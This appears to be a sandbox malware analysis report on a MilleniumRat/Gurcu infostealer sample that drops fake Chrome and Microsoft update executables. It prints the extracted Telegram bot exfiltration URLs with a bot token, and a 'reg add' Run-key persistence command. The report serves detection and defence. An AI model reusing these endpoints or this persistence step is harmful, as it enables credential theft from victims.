Analysis
-
max time kernel
31s -
max time network
31s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
22-11-2024 00:37
Static task
static1
Behavioral task
behavioral1
Sample
system user.exe
Resource
win10v2004-20241007-en
General
-
Target
system user.exe
-
Size
16.2MB
-
MD5
b46ff65472aba689f7cdd2b81cd42142
-
SHA1
16251509795e6126f8883e97180c197f713dc88c
-
SHA256
d0596d6ec9df77425df57135e143609cb95e2d5817dbf59632081a3940d3bc61
-
SHA512
be7c2989ef10225183aa6fe7f356c1b96b7bed3e2cd99a7d99b80d89337b6666efd0c1a75227505f1e3fa2e3ab99dcf67c1bf933549724b5c695b6c44cc090f3
-
SSDEEP
393216:t4A662tOh7skhs2n5nXaBIteAhOBq1FS8pbGReR9gyLp/dh:t4AotuI2sNI9S8p7RCyLp/dh
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7822501916:AAHa6lPJ5KfvRLcTm8nATPQ9AUCR8cMhsy0/sendDocument?chat_id=-4585616644&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb
https://api.telegram.org/bot7822501916:AAHa6lPJ5KfvRLcTm8nATPQ9AUCR8cMhsy0/sendMessage?chat_id=-4585616644
https://api.telegram.org/bot7822501916:AAHa6lPJ5KfvRLcTm8nATPQ9AUCR8cMhsy0/getUpdates?offset=-
https://api.telegram.org/bot7822501916:AAHa6lPJ5KfvRLcTm8nATPQ9AUCR8cMhsy0/sendDocument?chat_id=-4585616644&caption=%F0%9F%93%B8Screenshot%20take
Signatures
-
Gurcu family
-
MilleniumRat
MilleniumRat is a remote access trojan written in C#.
-
Milleniumrat family
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
system user.exeChromeUpdate.exeUpdate.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation system user.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation ChromeUpdate.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Update.exe -
Executes dropped EXE 4 IoCs
Processes:
MSUpdate.exeChromeUpdate.exeMSUpdate.exeUpdate.exepid process 4580 MSUpdate.exe 1980 ChromeUpdate.exe 2516 MSUpdate.exe 4576 Update.exe -
Loads dropped DLL 20 IoCs
Processes:
ChromeUpdate.exeMSUpdate.exeUpdate.exepid process 1980 ChromeUpdate.exe 2516 MSUpdate.exe 2516 MSUpdate.exe 2516 MSUpdate.exe 2516 MSUpdate.exe 2516 MSUpdate.exe 2516 MSUpdate.exe 2516 MSUpdate.exe 2516 MSUpdate.exe 2516 MSUpdate.exe 2516 MSUpdate.exe 2516 MSUpdate.exe 2516 MSUpdate.exe 2516 MSUpdate.exe 2516 MSUpdate.exe 2516 MSUpdate.exe 2516 MSUpdate.exe 2516 MSUpdate.exe 2516 MSUpdate.exe 4576 Update.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
MSUpdate.exereg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CLPPTH = "C:\\Users\\Admin\\AppData\\Roaming\\CLPPTH\\clppth.exe" MSUpdate.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLog\\Update.exe" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 20 raw.githubusercontent.com 21 raw.githubusercontent.com 27 raw.githubusercontent.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 9 ip-api.com 15 api.ipify.org 16 api.ipify.org -
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Detects Pyinstaller 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\MSUpdate.exe pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
Update.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 Update.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Update.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 3564 timeout.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 54 IoCs
Processes:
ChromeUpdate.exeUpdate.exepid process 1980 ChromeUpdate.exe 1980 ChromeUpdate.exe 1980 ChromeUpdate.exe 1980 ChromeUpdate.exe 1980 ChromeUpdate.exe 1980 ChromeUpdate.exe 1980 ChromeUpdate.exe 1980 ChromeUpdate.exe 1980 ChromeUpdate.exe 1980 ChromeUpdate.exe 1980 ChromeUpdate.exe 1980 ChromeUpdate.exe 1980 ChromeUpdate.exe 1980 ChromeUpdate.exe 1980 ChromeUpdate.exe 1980 ChromeUpdate.exe 1980 ChromeUpdate.exe 1980 ChromeUpdate.exe 1980 ChromeUpdate.exe 1980 ChromeUpdate.exe 1980 ChromeUpdate.exe 1980 ChromeUpdate.exe 1980 ChromeUpdate.exe 4576 Update.exe 4576 Update.exe 4576 Update.exe 4576 Update.exe 4576 Update.exe 4576 Update.exe 4576 Update.exe 4576 Update.exe 4576 Update.exe 4576 Update.exe 4576 Update.exe 4576 Update.exe 4576 Update.exe 4576 Update.exe 4576 Update.exe 4576 Update.exe 4576 Update.exe 4576 Update.exe 4576 Update.exe 4576 Update.exe 4576 Update.exe 4576 Update.exe 4576 Update.exe 4576 Update.exe 4576 Update.exe 4576 Update.exe 4576 Update.exe 4576 Update.exe 4576 Update.exe 4576 Update.exe 4576 Update.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
ChromeUpdate.exetasklist.exeUpdate.exedescription pid process Token: SeDebugPrivilege 1980 ChromeUpdate.exe Token: SeDebugPrivilege 452 tasklist.exe Token: SeDebugPrivilege 4576 Update.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Update.exepid process 4576 Update.exe -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
system user.exeMSUpdate.exeChromeUpdate.execmd.exeUpdate.execmd.exedescription pid process target process PID 4708 wrote to memory of 4580 4708 system user.exe MSUpdate.exe PID 4708 wrote to memory of 4580 4708 system user.exe MSUpdate.exe PID 4708 wrote to memory of 1980 4708 system user.exe ChromeUpdate.exe PID 4708 wrote to memory of 1980 4708 system user.exe ChromeUpdate.exe PID 4580 wrote to memory of 2516 4580 MSUpdate.exe MSUpdate.exe PID 4580 wrote to memory of 2516 4580 MSUpdate.exe MSUpdate.exe PID 1980 wrote to memory of 3756 1980 ChromeUpdate.exe cmd.exe PID 1980 wrote to memory of 3756 1980 ChromeUpdate.exe cmd.exe PID 3756 wrote to memory of 3504 3756 cmd.exe chcp.com PID 3756 wrote to memory of 3504 3756 cmd.exe chcp.com PID 3756 wrote to memory of 452 3756 cmd.exe tasklist.exe PID 3756 wrote to memory of 452 3756 cmd.exe tasklist.exe PID 3756 wrote to memory of 3008 3756 cmd.exe find.exe PID 3756 wrote to memory of 3008 3756 cmd.exe find.exe PID 3756 wrote to memory of 3564 3756 cmd.exe timeout.exe PID 3756 wrote to memory of 3564 3756 cmd.exe timeout.exe PID 3756 wrote to memory of 4576 3756 cmd.exe Update.exe PID 3756 wrote to memory of 4576 3756 cmd.exe Update.exe PID 4576 wrote to memory of 4160 4576 Update.exe cmd.exe PID 4576 wrote to memory of 4160 4576 Update.exe cmd.exe PID 4160 wrote to memory of 2112 4160 cmd.exe reg.exe PID 4160 wrote to memory of 2112 4160 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\system user.exe"C:\Users\Admin\AppData\Local\Temp\system user.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4708 -
C:\Users\Admin\AppData\Roaming\MSUpdate.exe"C:\Users\Admin\AppData\Roaming\MSUpdate.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4580 -
C:\Users\Admin\AppData\Roaming\MSUpdate.exe"C:\Users\Admin\AppData\Roaming\MSUpdate.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:2516
-
-
-
C:\Users\Admin\AppData\Roaming\ChromeUpdate.exe"C:\Users\Admin\AppData\Roaming\ChromeUpdate.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp9163.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp9163.tmp.bat3⤵
- Suspicious use of WriteProcessMemory
PID:3756 -
C:\Windows\system32\chcp.comchcp 650014⤵PID:3504
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 1980"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:452
-
-
C:\Windows\system32\find.exefind ":"4⤵PID:3008
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak4⤵
- Delays execution with timeout.exe
PID:3564
-
-
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f5⤵
- Suspicious use of WriteProcessMemory
PID:4160 -
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f6⤵
- Adds Run key to start application
- Modifies registry key
PID:2112
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD565ccd6ecb99899083d43f7c24eb8f869
SHA127037a9470cc5ed177c0b6688495f3a51996a023
SHA256aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d
-
Filesize
117KB
MD5862f820c3251e4ca6fc0ac00e4092239
SHA1ef96d84b253041b090c243594f90938e9a487a9a
SHA25636585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153
SHA5122f8a0f11bccc3a8cb99637deeda0158240df0885a230f38bb7f21257c659f05646c6b61e993f87e0877f6ba06b347ddd1fc45d5c44bc4e309ef75ed882b82e4e
-
Filesize
82KB
MD5fe499b0a9f7f361fa705e7c81e1011fa
SHA1cc1c98754c6dab53f5831b05b4df6635ad3f856d
SHA256160b5218c2035cccbaab9dc4ca26d099f433dcb86dbbd96425c933dc796090df
SHA51260520c5eb5ccc72ae2a4c0f06c8447d9e9922c5f9f1f195757362fc47651adcc1cdbfef193ae4fec7d7c1a47cf1d9756bd820be996ae145f0fbbbfba327c5742
-
Filesize
122KB
MD5302ddf5f83b5887ab9c4b8cc4e40b7a6
SHA10aa06af65d072eb835c8d714d0f0733dc2f47e20
SHA2568250b4c102abd1dba49fc5b52030caa93ca34e00b86cee6547cc0a7f22326807
SHA5125ddc2488fa192d8b662771c698a63faaf109862c8a4dd0df10fb113aef839d012df58346a87178aff9a1b369f82d8ae7819cef4aad542d8bd3f91327feace596
-
Filesize
250KB
MD582321fb8245333842e1c31f874329170
SHA181abb1d3d5c55db53e8aca9bdf74f2dec0aba1a3
SHA256b7f9603f98ef232a2c5bce7001d842c01d76ed35171afbd898e6d17facf38b56
SHA5120cf932ee0d1242ea9377d054adcd71fdd7ec335abbac865e82987e3979e24cead6939cca19da63a08e08ac64face16950edce7918e02bfc7710f09645fd2fa19
-
Filesize
64KB
MD50abfee1db6c16e8ddaff12cd3e86475b
SHA1b2dda9635ede4f2841912cc50cb3ae67eea89fe7
SHA256b4cec162b985d34ab768f66e8fa41ed28dc2f273fde6670eeace1d695789b137
SHA5120a5cae4e3442af1d62b65e8bf91e0f2a61563c2b971bbf008bfb2de0f038ee472e7bfcc88663dc503b2712e92e6a7e6a5f518ddab1fab2eb435d387b740d2d44
-
Filesize
154KB
MD5e3e7e99b3c2ea56065740b69f1a0bc12
SHA179fa083d6e75a18e8b1e81f612acb92d35bb2aea
SHA256b095fa2eac97496b515031fbea5737988b18deee86a11f2784f5a551732ddc0c
SHA51235cbc30b1ccdc4f5cc9560fc0149373ccd9399eb9297e61d52e6662bb8c56c6a7569d8cfad85aeb057c10558c9352ae086c0467f684fdcf72a137eadf563a909
-
Filesize
81KB
MD5632336eeead53cfad22eb57f795d5657
SHA162f5f73d21b86cd3b73b68e5faec032618196745
SHA256ce3090fff8575b21287df5fc69ae98806646fc302eefadf85e369ad3debad92b
SHA51277965b45060545e210cdb044f25e5fd68d6a9150caf1cad7645dbafcf1ce8e1ccbdf8436fbdcbf5f9c293321c8916e114de30ed8897c7db72df7f8d1f98dfb55
-
Filesize
173KB
MD5eea3e12970e28545a964a95da7e84e0b
SHA1c3ccac86975f2704dabc1ffc3918e81feb3b9ac1
SHA25661f00b0543464bba61e0bd1128118326c9bd0cdc592854dd1a31c3d6d8df2b83
SHA5129bd5c83e7e0ab24d6be40a31ac469a0d9b4621a2a279a5f3ab2fc6401a08c54aec421bc9461aed533a0211d7dbda0c264c5f05aeb39138403da25c8cda0339e6
-
Filesize
21KB
MD508edf746b4a088cb4185c165177bd604
SHA1395cda114f23e513eef4618da39bb86d034124bf
SHA256517204ee436d08efc287abc97433c3bffcaf42ec6592a3009b9fd3b985ad772c
SHA512c1727e265a6b0b54773c886a1bce73512e799ba81a4fceeeb84cdc33f5505a5e0984e96326a78c46bf142bc4652a80e213886f60eb54adf92e4dffe953c87f6b
-
Filesize
1KB
MD5e9117326c06fee02c478027cb625c7d8
SHA12ed4092d573289925a5b71625cf43cc82b901daf
SHA256741859cf238c3a63bbb20ec6ed51e46451372bb221cfff438297d261d0561c2e
SHA512d0a39bc41adc32f2f20b1a0ebad33bf48dfa6ed5cc1d8f92700cdd431db6c794c09d9f08bb5709b394acf54116c3a1e060e2abcc6b503e1501f8364d3eebcd52
-
Filesize
746B
MD5a387908e2fe9d84704c2e47a7f6e9bc5
SHA1f3c08b3540033a54a59cb3b207e351303c9e29c6
SHA25677265723959c092897c2449c5b7768ca72d0efcd8c505bddbb7a84f6aa401339
SHA5127ac804d23e72e40e7b5532332b4a8d8446c6447bb79b4fe32402b13836079d348998ea0659802ab0065896d4f3c06f5866c6b0d90bf448f53e803d8c243bbc63
-
Filesize
25KB
MD5fe92c81bb4acdda00761c695344d5f1e
SHA1a87e1516fbd1f9751ec590273925cbc5284b16bd
SHA2567a103a85413988456c2ad615c879bbcb4d91435bcfbbe23393e0eb52b56af6e2
SHA512c983076e420614d12ab2a7342f6f74dd5dcdad21c7c547f660e73b74b3be487a560abd73213df3f58be3d9dbd061a12d2956ca85a58d7b9d9e40d9fa6e6c25eb
-
Filesize
620B
MD507532085501876dcc6882567e014944c
SHA16bc7a122429373eb8f039b413ad81c408a96cb80
SHA2566a4abd2c519a745325c26fb23be7bbf95252d653a24806eb37fd4aa6a6479afe
SHA5120d604e862f3a1a19833ead99aaf15a9f142178029ab64c71d193cee4901a0196c1eeddc2bce715b7fa958ac45c194e63c77a71e4be4f9aedfd5b44cf2a726e76
-
Filesize
23KB
MD5ddb0ab9842b64114138a8c83c4322027
SHA1eccacdc2ccd86a452b21f3cf0933fd41125de790
SHA256f46ab61cdebe3aa45fa7e61a48930d64a0d0e7e94d04d6bf244f48c36cafe948
SHA512c0cf718258b4d59675c088551060b34ce2bc8638958722583ac2313dc354223bfef793b02f1316e522a14c7ba9bed219531d505de94dc3c417fc99d216a01463
-
Filesize
5KB
MD5c62fb22f4c9a3eff286c18421397aaf4
SHA14a49b8768cff68f2effaf21264343b7c632a51b2
SHA256ddf7e42def37888ad0a564aa4f8ca95f4eec942cebebfca851d35515104d5c89
SHA512558d401cb6af8ce3641af55caebc9c5005ab843ee84f60c6d55afbbc7f7129da9c58c2f55c887c3159107546fa6bc13ffc4cca63ea8841d7160b8aa99161a185
-
Filesize
11KB
MD5215262a286e7f0a14f22db1aa7875f05
SHA166b942ba6d3120ef8d5840fcdeb06242a47491ff
SHA2564b7ed9fd2363d6876092db3f720cbddf97e72b86b519403539ba96e1c815ed8f
SHA5126ecd745d7da9d826240c0ab59023c703c94b158ae48c1410faa961a8edb512976a4f15ae8def099b58719adf0d2a9c37e6f29f54d39c1ab7ee81fa333a60f39b
-
Filesize
21KB
MD5aeb53f7f1506cdfdfe557f54a76060ce
SHA1ebb3666ee444b91a0d335da19c8333f73b71933b
SHA2561f5dd8d81b26f16e772e92fd2a22accb785004d0ed3447e54f87005d9c6a07a5
SHA512acdad4df988df6b2290fc9622e8eaccc31787fecdc98dcca38519cb762339d4d3fb344ae504b8c7918d6f414f4ad05d15e828df7f7f68f363bec54b11c9b7c43
-
Filesize
18KB
MD5007f42fbcdc57652ac8381f11af7fb67
SHA11bb1b0fcad6f5633d1beb8903112f180b1c4ba7f
SHA25665ba33a1e0b21e8e074780a51189cee6fd9926c85273e9e7633987fc212a17b2
SHA512a27089719adafc48b5abb905e40d0c6a0a2507526223d72c1cff36ab7c15362c6f0b8ee5775181ba1730852802afa64631ee3720e624b630e3274bfb32f6a59a
-
Filesize
10KB
MD5995a0a8f7d0861c268aead5fc95a42ea
SHA121e121cf85e1c4984454237a646e58ec3c725a72
SHA2561264940e62b9a37967925418e9d0dc0befd369e8c181b9bab3d1607e3cc14b85
SHA512db7f5e0bc7d5c5f750e396e645f50a3e0cde61c9e687add0a40d0c1aa304ddfbceeb9f33ad201560c6e2b051f2eded07b41c43d00f14ee435cdeee73b56b93c7
-
Filesize
14KB
MD5804e6dce549b2e541986c0ce9e75e2d1
SHA1c44ee09421f127cf7f4070a9508f22709d06d043
SHA25647c75f9f8348bf8f2c086c57b97b73741218100ca38d10b8abdf2051c95b9801
SHA512029426c4f659848772e6bb1d8182eb03d2b43adf68fcfcc1ea1c2cc7c883685deda3fffda7e071912b9bda616ad7af2e1cb48ce359700c1a22e1e53e81cae34b
-
Filesize
38KB
MD5b7daa21c1c192b8cb5b86cbd7b2ce068
SHA1ae8abf9017f37ccdf5d0d15de66bb124a7482ba0
SHA256312af944a276cdbf1ee00757ef141595670984f7f13e19922c25643a040f5339
SHA512b619e3b8be5ec4545e97b7a7a7f7fecc2aafa58438f9ca3819f644720cf5ff5c44da12ac25988570e595d97cad799f87d93c24d5e67a7a953b9f5312952fbeb6
-
Filesize
5KB
MD5286c01a1b12261bc47f5659fd1627abd
SHA14ca36795cab6dfe0bbba30bb88a2ab71a0896642
SHA256aa4f87e41ac8297f51150f2a9f787607690d01793456b93f0939c54d394731f9
SHA512d54d5a89b7408a9724a1ca1387f6473bdad33885194b2ec5a524c7853a297fd65ce2a57f571c51db718f6a00dce845de8cf5f51698f926e54ed72cdc81bcfe54
-
Filesize
376B
MD58a0517a7a4c70111080ed934329e2bc5
SHA15b465e0d3500a8f04ee1c705662032f44e2ed0d2
SHA256a5d208887a94832328c3a33928a80f3b46aa205c20db4f050a47d940e94071b4
SHA512d9f502a006a5e0514fd61426818ad1f4168e449588f9d383d6b0bf87a18be82c420863a9a28e1beb441284a0b1bc2a0b3d3276a0fe3196341aec15a27920de5d
-
Filesize
8KB
MD5d45202d3d2d052d4c6bfe8d1322aab39
SHA18cdf184ac2e9299b2b2a107a64e9d1803aa298de
SHA2560747a387fdd1b2c7135eceae7b392ed52e1d1ebf3ffa90febe886dbc0981eb74
SHA51227b005f955bae00d15c4492e7bd3ebdc5ee3bf9c164c418198b4bd185709c8810aa6cf76cbcc07eeb4c1d20f8c76ef8df8b219563c18b88c94954c910bff575d
-
Filesize
12KB
MD55249cd1e97e48e3d6dec15e70b9d7792
SHA1612e021ba25b5e512a0dfd48b6e77fc72894a6b9
SHA256eec90404f702d3cfbfaec0f13bf5ed1ebeb736bee12d7e69770181a25401c61f
SHA512e4e0ab15eb9b3118c30cd2ff8e5af87c549eaa9b640ffd809a928d96b4addefb9d25efdd1090fbd0019129cdf355bb2f277bc7194001ba1d2ed4a581110ceafc
-
Filesize
16KB
MD5eaa36f0aa69ae19ddbdd0448fbad9d4d
SHA1eb0adb4f4d937bac2f17480adaf6f948262e754d
SHA256747889c3086c917a34554a9dc495bc0c08a03fd3a5828353ed2a64b97f376835
SHA512c8368f19ec6842ed67073b9fc9c9274107e643324cb23b28c54df63fb720f63b043281b30dbea053d08481b0442a87465f715a8aa0711b01ce83ff7b9f8a4f4c
-
Filesize
34KB
MD59ca5094ed6fe46620abf090bf8e2ae63
SHA160dc3c2e3f69ce5b6db4f2b3a1f3c109d766bc63
SHA256ab88556e349f03baca2d8dc2121071a4f299db86f484cab2d9249ff4c7007564
SHA5120b0c20a754be744a7fa214ba06ab0744a9bc466d51f96310d97ea1e61119a8acfef24e6dc5c4ebdd2c126bf84ace74ffe622e9641c87e5a240dd13d1f7b5e6af
-
Filesize
23KB
MD5184d05201893b2042d3fa6140fcf277c
SHA1aad67797864456749adf0c4a1c0be52f563c8fb8
SHA2561d5e7518afc1382e36bf13fc5196c8a7cd93a4e9d24acf445522564245a489b0
SHA512291bdf793cabc5ec27e8265a8a313fe0f4acab4db6ce507a46488a83eef72cd43cf5815762b22d1c8d64a9eedea927e109f937e6573058e5493b1354dd449cb3
-
Filesize
64KB
MD5ed2305190284e384a31337094c9f5239
SHA1eb8faebf9fe9438541ca65b9892badc2233a405d
SHA2562cad195ba200cd94702403559323c7abf3772a20203a11beae03770a04437de2
SHA512139c83ebf748720e64c7a6a8f00f45755d17cd8f754cadc0804ece5753c02e5c95210a8b96a92fff89148ba34568f8b1bd6c33d1d3ba7a75f881446956876893
-
Filesize
1.3MB
MD5bed03063e08a571088685625544ce144
SHA156519a1b60314ec43f3af0c5268ecc4647239ba3
SHA2560d960743dbf746817b61ff7dd1c8c99b4f8c915de26946be56118cd6bedaebdc
SHA512c136e16db86f94b007db42a9bf485a7c255dcc2843b40337e8f22a67028117f5bd5d48f7c1034d7446bb45ea16e530f1216d22740ddb7fab5b39cc33d4c6d995
-
Filesize
5.0MB
MD5123ad0908c76ccba4789c084f7a6b8d0
SHA186de58289c8200ed8c1fc51d5f00e38e32c1aad5
SHA2564e5d5d20d6d31e72ab341c81e97b89e514326c4c861b48638243bdf0918cfa43
SHA51280fae0533ba9a2f5fa7806e86f0db8b6aab32620dde33b70a3596938b529f3822856de75bddb1b06721f8556ec139d784bc0bb9c8da0d391df2c20a80d33cb04
-
Filesize
38KB
MD50f8e4992ca92baaf54cc0b43aaccce21
SHA1c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA5126e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978
-
Filesize
774KB
MD54ff168aaa6a1d68e7957175c8513f3a2
SHA1782f886709febc8c7cebcec4d92c66c4d5dbcf57
SHA2562e4d35b681a172d3298caf7dc670451be7a8ba27c26446efc67470742497a950
SHA512c372b759b8c7817f2cbb78eccc5a42fa80bdd8d549965bd925a97c3eebdce0335fbfec3995430064dead0f4db68ebb0134eb686a0be195630c49f84b468113e3
-
Filesize
623KB
MD5bf7ec0b82a738169c915eedbff1a3d62
SHA13fc649aa591215724379edb1b24043d9547be3c6
SHA256f9f67929fdf5568227c1b3e16649956378638165f5e99d345f0df2faa904b926
SHA5126284ffcb332c04e3712a999a5a435c6e39aaf4214016f9a269f2afe3dfd1b1e18ce6ba87e7609936fb0cc6484137b2ac0677f48774d8e6d67c976efc6a666b05
-
Filesize
6.6MB
MD5b243d61f4248909bc721674d70a633de
SHA11d2fb44b29c4ac3cfd5a7437038a0c541fce82fc
SHA25693488fa7e631cc0a2bd808b9eee8617280ee9b6ff499ab424a1a1cbf24d77dc7
SHA51210460c443c7b9a6d7e39ad6e2421b8ca4d8329f1c4a0ff5b71ce73352d2e9438d45f7d59edb13ce30fad3b4f260bd843f4d9b48522d448310d43e0988e075fcb
-
Filesize
30KB
MD57e871444ca23860a25b888ee263e2eaf
SHA1aa43c9d3abdb1aabda8379f301f8116d0674b590
SHA256dca5e6d39c5094ce599143cb82f6d8470f0c2a4ce4443499e73f32ed13333fd0
SHA5122e260d3123f7ca612901513b90fe40739e85248da913297d4cca3b2ebd398d9697880d148830e168e474ebfc3d30ede10668c7316ed7668f8b39da7bca59e57d
-
Filesize
1.7MB
MD5bed46aa40c392c9068aed5f94857d398
SHA1227561d5f6a592dedd7a8b0ffe0c284f9bbf23e8
SHA25622a1746363151a19e02f92f9b7bc4849038783be34c04f311a11df69fdc1a039
SHA51204850421617366faeaa711fd28dcf58ff1bc5aa2b0cb962fbfc47b5ae645b3726f3decc19d0b36b23c6b00210badeefc67f83ba6f0a81d6de57dc27001ac19be
-
Filesize
34KB
MD5bd4ff2a1f742d9e6e699eeee5e678ad1
SHA1811ad83aff80131ba73abc546c6bd78453bf3eb9
SHA2566774519f179872ec5292523f2788b77b2b839e15665037e097a0d4edddd1c6fb
SHA512b77e4a68017ba57c06876b21b8110c636f9ba1dd0ba9d7a0c50096f3f6391508cf3562dd94aceaf673113dbd336109da958044aefac0afb0f833a652e4438f43
-
Filesize
1.5MB
MD56ddb534ef5c74627802ceef0c90b38f3
SHA1ffa3b78435e7a121ba6a3de32a7c3950a3f1cb28
SHA256f44fa94865d17e4f0266c8f9a1dd89825d8a0c6c3a63cf4192fc08c8796acabf
SHA5120cf66eeaa3aef2c7da560c370865bbd84ac2e94536bf751907bf42f36c05b5d0c46f883b1f35daf9e21e8eec1a7fcad439e21a23e114ab0a3a0daf39e8c95eb0
-
Filesize
1.1MB
MD5098cc6ad04199442c3e2a60e1243c2dc
SHA14c92c464a8e1e56e1c4d77cd30a0da474a026aaf
SHA25664a162d6b11ba10cb11509f3cc445f17beb7acfd064f030b4d59faa1c9894b29
SHA51273c28488b42a0bc2f0d2861fed3f5dcccf8959ce19d3121c13c998db496f2822deb40f36f86240c8d3954fd2dc2ba5d63c8a125b62324dcd92fb6c8ba49ff170
-
Filesize
143KB
MD52849986dadc875a7a92889eced861a36
SHA1c723d5e55deb07699f2fc83999b07bd9dab1182e
SHA25684cc14c704067bffd2b4dd411abe752eb492431814cf9ac13417d061a3db0ec3
SHA512b8376fe9ead1f43eebbaee92e649ba528b3eb2d2b774534f46511ea0a1da743438e03bb793b9bc02a59fbadd5ae32e537c29522dd205d2a4d3e584357fa1bdd6
-
Filesize
5.6MB
MD58df87acac0fec3cc3a0583d5bd322503
SHA1023731a7643fb6eddc473e5b7553ca482e9f8acd
SHA2564adf744fb30dfa98fd07c72f06f818ec049973670e4c81ac077790d388b3d498
SHA512b763a29a836abb1ed83fdfa24a882e4d6e0b21cb47ace87e024b64613d4bc5831afd50f44e75f94ca67d9a87dfc676abdf40ebdbb74d091b551b35a67ed707bb
-
Filesize
10.5MB
MD579d19e7b20c0a9f3ac172041dcf84c97
SHA12e8a9c7d1aac017c1fabae50677e5bedea55c16d
SHA2566080208516fa0312f72202ff528cf3ae055fcec32049191c8b4043bdb52bf072
SHA5121d3fa42566c332501300da43e462a68341f9fc5aa5328d1b57cbb947e9b3e3eaa86d3368f52e82e3294fff63dc53587fda070967fa9a533dc4f9497a71e72e35